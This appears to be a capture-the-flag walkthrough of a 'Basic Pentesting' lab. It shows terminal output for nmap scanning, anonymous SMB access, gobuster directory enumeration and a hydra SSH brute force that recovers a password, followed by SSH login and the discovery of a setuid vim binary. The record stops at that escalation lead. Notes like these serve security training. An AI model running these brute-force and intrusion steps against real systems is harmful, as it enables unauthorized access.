Basic Pentesting
nmap reveals - 22/tcp ssh - 80/tcp http - 139/tcp netbios/smb - 445/tcp netbios/smb - 8080/tcp http
┌──(kali㉿kali)-[~]
└─$ sudo nmap -O -sV -vv -A -T4 10.10.188.81
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-31 05:26 EST
Scanning 10.10.188.81 [4 ports]
Completed Ping Scan at 05:26, 0.18s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 05:26
Completed Parallel DNS resolution of 1 host. at 05:26, 0.04s elapsed
Initiating SYN Stealth Scan at 05:26
Scanning 10.10.188.81 [1000 ports]
Discovered open port 139/tcp on 10.10.188.81
Discovered open port 8080/tcp on 10.10.188.81
Discovered open port 22/tcp on 10.10.188.81
Discovered open port 445/tcp on 10.10.188.81
Discovered open port 80/tcp on 10.10.188.81
Discovered open port 8009/tcp on 10.10.188.81
Completed SYN Stealth Scan at 05:26, 1.60s elapsed (1000 total ports)
Initiating Service scan at 05:26
Scanning 6 services on 10.10.188.81
Completed Service scan at 05:26, 11.34s elapsed (6 services on 1 host)
Nmap scan report for 10.10.188.81
Host is up, received echo-reply ttl 61 (0.11s latency).
Scanned at 2023-01-31 05:26:41 EST for 34s
Not shown: 994 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 61 OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 db45cbbe4a8b71f8e93142aefff845e4 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDZXasCfWSXQ9lYiKbTNkPs0T+wFym2lZy229LllhY6iDLrjm7LIkhCcrlgnJQtLxl5NPhlHNVmwhlkcPPiAHwluhMVE5xKihQj3i+Ucx2IwiFvfmCz4AKsWlR6N8IZe55Ltw0lcH9ykuKZddg81X85EVsNbMacJNjjyxAtwQmJt1F5kB1B2ixgjLLOyNWafC5g1h6XbEgB2wiSRJ5UA8rOZaF28YcDVo0MQhsKpQG/5oPmQUsIeJTUA/XkoWCjvXZqHwv8XInQLQu3VXKgv735G+CJaKzplh7FZyXju8ViDSAY8gdhqpJommYxzqu9s1M31cmFg2fT5V1z9s4DP/vd
| 256 09b9b91ce0bf0e1c6f7ffe8e5f201bce (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBP0SXJpgwPf/e9AT9ri/dlAnkob4PqzMjl2Q9lZIVIXeEFJ9sfRkC+tgSjk9PwK0DUO3JU27pmtAkDL4Mtv9eZw=
| 256 a5682b225f984a62213da2e2c5a9f7c2 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIAzy8ZacWXbPGeqtuiJCnPP0LYZYZlMj5D1ZY9ldg1wU
80/tcp open http syn-ack ttl 61 Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
139/tcp open netbios-ssn syn-ack ttl 61 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn syn-ack ttl 61 Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8009/tcp open ajp13 syn-ack ttl 61 Apache Jserv (Protocol v1.3)
| ajp-methods:
|_ Supported methods: GET HEAD POST OPTIONS
8080/tcp open http syn-ack ttl 61 Apache Tomcat 9.0.7
|_http-favicon: Apache Tomcat
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Apache Tomcat/9.0.7
┌──(kali㉿kali)-[~]
└─$ smbclient //10.10.188.81/Anonymous -N
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Apr 19 13:31:20 2018
.. D 0 Thu Apr 19 13:13:06 2018
staff.txt N 173 Thu Apr 19 13:29:55 2018
14318640 blocks of size 1024. 11077704 blocks available
smb: \> get staff.txt
getting file \staff.txt of size 173 as staff.txt (0.4 KiloBytes/sec) (average 0.4 KiloBytes/sec)
EXIT
┌──(kali㉿kali)-[~]
└─$ cat staff.txt
Announcement to staff:
PLEASE do not upload non-work-related items to this share. I know it's all in fun, but
this is how mistakes happen. (This means you too, Jan!)
-Kay
──(kali㉿kali)-[~/thm/basic-pentesting]
└─$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.188.81
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.188.81
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.4
[+] Timeout: 10s
===============================================================
2023/01/31 05:16:26 Starting gobuster in directory enumeration mode
===============================================================
/development (Status: 301) [Size: 318] [--> http://10.10.188.81/development/]
/server-status (Status: 403) [Size: 300]
Progress: 220560 / 220561 (100.00%)
===============================================================
2023/01/31 05:55:23 Finished
===============================================================
hydra with jan reveals - password armanda
┌──(kali㉿kali)-[~/thm/basic-pentesting]
└─$ hydra -l jan -P /opt/rockyou.txt 10.10.229.151 ssh
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-01-30 11:07:15
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task
[DATA] attacking ssh://10.10.229.151:22/
[STATUS] 166.00 tries/min, 166 tries in 00:01h, 14344233 to do in 1440:12h, 15 active
[STATUS] 110.33 tries/min, 331 tries in 00:03h, 14344068 to do in 2166:47h, 15 active
[STATUS] 109.43 tries/min, 766 tries in 00:07h, 14343633 to do in 2184:38h, 15 active
[22][ssh] host: 10.10.229.151 login: jan password: armando
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 1 final worker threads did not complete until end.
[ERROR] 1 target did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-01-30 11:14:41
┌──(kali㉿kali)-[~/thm/basic-pentesting]
└─$ ssh jan@10.10.188.81
The authenticity of host '10.10.188.81 (10.10.188.81)' can't be established.
ED25519 key fingerprint is SHA256:XKjDkLKocbzjCch0Tpriw1PeLPuzDufTGZa4xMDA+o4.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.188.81' (ED25519) to the list of known hosts.
jan@10.10.188.81's password:
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-119-generic x86_64)
jan@basic2:~$ ls -aslp
total 12
4 drwxr-xr-x 2 root root 4096 Jan 31 10:36 ./
4 drwxr-xr-x 4 root root 4096 Apr 19 2018 ../
0 lrwxrwxrwx 1 root root 9 Jan 31 10:36 .bash_history -> /dev/null
4 -rw------- 1 root jan 47 Apr 23 2018 .lesshst
jan@basic2:~$ cd ..
jan@basic2:/home$ ls
jan kay
jan@basic2:/home$ cd kay
jan@basic2:/home/kay$ ls
pass.bak
jan@basic2:/home/kay$ cat pass.bak
cat: pass.bak: Permission denied
jan@basic2:/home/kay$ vim pass.bak
jan@basic2:/home/kay$ ls -aslp
total 44
4 drwxr-xr-x 5 kay kay 4096 Jan 31 10:37 ./
4 drwxr-xr-x 4 root root 4096 Apr 19 2018 ../
0 lrwxrwxrwx 1 root root 9 Jan 31 10:36 .bash_history -> /dev/null
4 -rw-r--r-- 1 kay kay 220 Apr 17 2018 .bash_logout
4 -rw-r--r-- 1 kay kay 3771 Apr 17 2018 .bashrc
4 drwx------ 2 kay kay 4096 Apr 17 2018 .cache/
4 -rw------- 1 root kay 119 Apr 23 2018 .lesshst
4 drwxrwxr-x 2 kay kay 4096 Apr 23 2018 .nano/
4 -rw------- 1 kay kay 57 Apr 23 2018 pass.bak
4 -rw-r--r-- 1 kay kay 655 Apr 17 2018 .profile
4 drwxr-xr-x 2 kay kay 4096 Apr 23 2018 .ssh/
0 -rw-r--r-- 1 kay kay 0 Apr 17 2018 .sudo_as_admin_successful
4 -rw------- 1 root kay 538 Apr 23 2018 .viminfo
jan@basic2:/home/kay$ ls -alh /etc/alternatives/vim
lrwxrwxrwx 1 root root 18 Apr 17 2018 /etc/alternatives/vim -> /usr/bin/vim.basic
jan@basic2:/home/kay$ ls -alh /usr/bin/vim.basic
-rwsr-xr-x 1 root root 2.4M Nov 24 2016 /usr/bin/vim.basic